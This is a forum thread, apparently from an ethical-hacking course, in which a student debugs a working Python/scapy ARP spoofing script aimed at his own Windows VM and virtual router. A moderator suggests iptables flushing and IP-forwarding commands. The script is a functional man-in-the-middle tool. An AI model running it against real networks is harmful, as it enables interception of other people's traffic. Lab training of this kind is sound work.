Tagged: 

Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • August 31, 2020 at 8:26 pm #44914
    NikolajevZj
    Participant

    I’m doing the arp spoof section of the course.When I run my script i manage to fool both the windows VM and the router,but even after typing the echo 1 > /proc/sys/net/ipv4/ip_forward command the windows machine doesn’t have internet access.
    Script:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-

    import scapy.all as scapy
    import time

    def title():
    print(” ___ _____ __ __ _____ “)
    print(” / _ \ / ___| / _| / | | _ |”)
    print(“/ /_\ \_ __ _ __ \ --. _ __ ___ ___ | |_| | | |/’ |”)
    print(“| _ | ‘__| ‘_ \ `–. \ ‘_ \ / _ \ / _ \| _| | | | /| |”)
    print(“| | | | | | |_) | /\__/ / |_) | (_) | (_) | | _| |_\ |_/ /”)
    print(“\_| |_/_| | .__/ \____/| .__/ \___/ \___/|_| \___(_)___/”)
    print(” | | | | “)

    def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst=”ff:ff:ff:ff:ff:Ff”)
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

    def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

    title()
    while True:
    spoof(“10.0.2.15”, “10.0.2.1”)
    spoof(“10.0.2.1”, “10.0.2.15”)
    time.sleep(2)
    result of kali ifconfig:
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

    inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255

    inet6 fe80::a00:27ff:fed5:7a16 prefixlen 64 scopeid 0x20<link>

    ether 08:00:27:d5:7a:16 txqueuelen 1000 (Ethernet)

    RX packets 5008 bytes 4040358 (3.8 MiB)

    RX errors 0 dropped 0 overruns 0 frame 0

    TX packets 4326 bytes 1807344 (1.7 MiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

    inet 127.0.0.1 netmask 255.0.0.0

    inet6 ::1 prefixlen 128 scopeid 0x10<host>

    loop txqueuelen 1000 (Local Loopback)

    RX packets 48 bytes 2677 (2.6 KiB)

    RX errors 0 dropped 0 overruns 0 frame 0

    TX packets 48 bytes 2677 (2.6 KiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

    inet 192.168.1.27 netmask 255.255.255.0 broadcast 192.168.1.255

    inet6 fe80::ab51:ec48:9d2c:390b prefixlen 64 scopeid 0x20<link>

    ether 00:c0:ca:98:9f:fb txqueuelen 1000 (Ethernet)

    RX packets 918 bytes 154601 (150.9 KiB)

    RX errors 0 dropped 101 overruns 0 frame 0

    TX packets 452 bytes 44848 (43.7 KiB)

    TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

    result of route -n:
    Kernel IP routing table

    Destination Gateway Genmask Flags Metric Ref Use Iface

    0.0.0.0 10.0.2.1 0.0.0.0 UG 100 0 0 eth0

    0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0

    10.0.2.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0

    192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

    I’m honestly stuck,could someone help me?
    Also the windows and kali use the NAT network.

    September 1, 2020 at 2:09 am #44922
    Diego PérezDiego Pérez
    Moderator

    Hi!

    Can you check that windows and kali have internet access before running the attack?
    Can you show the results of:
    ifconfig and route -n in kali
    ipconfig in windows
    Can you share a screenshot of the Network settings used in VirtualBox for both machines?

    Bur use screenshots please as the info you have shared is hard to read. And for the code use code button from the menu because I can’t read it properly as it doesn’t have any indentation.

    Thanks!
    Diego

    September 1, 2020 at 8:53 am #44932
    NikolajevZj
    Participant

    Hello!
    Both kali and windows VM have internet access before the attack
    kali network settings:
    https://mega.nz/file/Z103STYJ#dzoaECQVUZHprhEtTDtsmgqCyKJv3CBjBUSljaJ5k0w
    kali ifconfig and route -n:
    https://mega.nz/file/Q5tlSbaA#pFKJ7GEPyBTVNpOJlJnHBNwVosaz5e4772cVfqH0g_g
    windows ipconfig:
    https://mega.nz/file/Ek11hZDB#1g04I9TpP3tQvAljNoauSGhIg9N3MzpJhNxvcgGOcN0
    windows network settings:
    https://mega.nz/file/EgkhDDzS#HLy6w9X1TZZGWLX-0YddZjud8qcMJxO1Ms2eJHErA1k
    my code(sorry i could not find the code button):
    https://mega.nz/file/JwkhnBDS#UMlLxjIFj8XNIqiOXRCfiKxkCKWVnQV52EhWUSquuxQ
    Thanks for your reply!

    September 2, 2020 at 3:01 am #44961
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Try by unplugging the wireless adapter, there’s no need for it. Then flush iptables rules and enable packet forwarding again:
    iptables –flush
    iptables –table nat –flush
    iptables –delete-chain
    iptables –table nat –delete-chain
    iptables -P FORWARD ACCEPT

    Enable port forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward

    Then run the attack again.

    Let me know how it goes!
    Diego

    September 2, 2020 at 6:35 am #44968
    NikolajevZj
    Participant

    Hello!
    I managed to solve my problem.Firstly i noticed that my windowsVM had an expired license,so I recovered the first snapshot.Then i tried again and everything worked perfectly.I also stopped the program before the execution of echo command.I don’t know if those two properties were the actual problem,or if it was some network issue
    that didn’t occur further,anyway it works know.Thanks for the iptables commands, I think they might be useful if I encounter similar problems.
    Best regards!

    September 3, 2020 at 2:54 am #44998
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Cool you got it!
    Diego

  • Author
    Posts
Viewing 6 posts - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.